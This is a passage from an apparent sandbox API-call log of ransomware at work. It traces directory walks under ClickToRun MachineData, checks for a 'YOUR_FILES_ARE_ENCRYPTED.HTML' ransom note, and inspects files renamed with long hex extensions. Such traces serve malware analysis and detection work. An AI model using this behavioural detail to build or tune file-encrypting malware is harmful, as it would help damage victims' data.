ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadaf1e82, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0109.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadaf1e82, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadaf1e82, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadaf55e9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.810] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0109.810] StrStrIW (lpFirst="{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.810] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned 111 [0109.810] GetProcessHeap () returned 0x600000 [0109.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0109.811] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}" [0109.811] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*" [0109.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadaea5bf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.811] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadaea5bf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0109.811] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadae7ed2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadae7ed2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadaee210, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x631188, dwReserved1=0x640130, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.811] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xadb9d206, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadb9d206, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x640130, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 1 [0109.811] StrStrIW (lpFirst="{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.812] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned 150 [0109.812] GetProcessHeap () returned 0x600000 [0109.812] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0109.812] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}" [0109.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*" [0109.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xadb9d206, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadb9d206, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0109.812] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xadb9d206, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadb9d206, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName="..", cAlternateFileName="")) returned 1 [0109.812] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7a88c0, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a88c0, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xada0d71c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName="DeploymentConfiguration.xml.C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456", cAlternateFileName="DEPLOY~1.C55")) returned 1 [0109.812] StrStrIW (lpFirst="DeploymentConfiguration.xml.C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.812] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456") returned 243 [0109.812] PathFindExtensionW (pszPath="DeploymentConfiguration.xml.C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456") returned=".C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456" [0109.812] lstrlenW (lpString=".C55C4CC3386D39CA67B7EFC99F2AFE6A87BB3727D6F6448EC1EE2A52F08AF456") returned 65 [0109.813] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb33ac2, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1cb33ac2, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc83d22, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4b480e, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName="Manifest.xml.F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265", cAlternateFileName="")) returned 1 [0109.813] StrStrIW (lpFirst="Manifest.xml.F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.813] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265") returned 228 [0109.813] PathFindExtensionW (pszPath="Manifest.xml.F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265") returned=".F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265" [0109.813] lstrlenW (lpString=".F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265") returned 65 [0109.813] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1db44a9e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1db44a9e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadb904a2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName="UserDeploymentConfiguration.xml.612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B", cAlternateFileName="USERDE~1.612")) returned 1 [0109.813] StrStrIW (lpFirst="UserDeploymentConfiguration.xml.612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.813] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B") returned 247 [0109.813] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml.612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B") returned=".612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B" [0109.813] lstrlenW (lpString=".612C781DE413AB05B13D1571D3E4DB38B349472B2ABE56F096B1D8FCC9A8843B") returned 65 [0109.813] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da81e72, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da81e72, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc8c630, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4107, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName="UserManifest.xml.983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B", cAlternateFileName="USERMA~1.983")) returned 1 [0109.813] StrStrIW (lpFirst="UserManifest.xml.983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.813] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B") returned 232 [0109.813] PathFindExtensionW (pszPath="UserManifest.xml.983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B") returned=".983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B" [0109.813] lstrlenW (lpString=".983E3B788A4DD401C68D88D8B1E8A17B56C5D03A4AFCE882EBB6C8B091A2FF0B") returned 65 [0109.813] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadae1dd6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadae1dd6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadae6d70, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.813] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadae1dd6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadae1dd6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadae6d70, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318cb98, dwReserved1=0x318cab8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.813] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0109.813] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0109.813] GetProcessHeap () returned 0x600000 [0109.813] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3186df8 [0109.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.814] GetProcessHeap () returned 0x600000 [0109.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3186df8 | out: hHeap=0x600000) returned 1 [0109.814] GetProcessHeap () returned 0x600000 [0109.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0109.815] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xadb9d206, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadb9d206, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x640130, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 0 [0109.815] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.815] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0109.815] GetProcessHeap () returned 0x600000 [0109.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3185df0 [0109.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.816] GetProcessHeap () returned 0x600000 [0109.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3185df0 | out: hHeap=0x600000) returned 1 [0109.816] GetProcessHeap () returned 0x600000 [0109.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0109.817] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a8, dwReserved1=0x640128, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0109.817] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.818] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0109.818] GetProcessHeap () returned 0x600000 [0109.818] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.818] GetProcessHeap () returned 0x600000 [0109.818] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.818] GetProcessHeap () returned 0x600000 [0109.818] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.819] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadaf7cdb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadaf7cdb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadafb72b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.819] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadaf7cdb, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadaf7cdb, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadafb72b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.819] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0109.819] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0109.819] GetProcessHeap () returned 0x600000 [0109.819] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.820] GetProcessHeap () returned 0x600000 [0109.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.820] GetProcessHeap () returned 0x600000 [0109.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.821] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0109.821] StrStrIW (lpFirst="Integration", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.821] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned 67 [0109.821] GetProcessHeap () returned 0x600000 [0109.821] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.822] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration" [0109.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*" [0109.822] FindFirstFileW 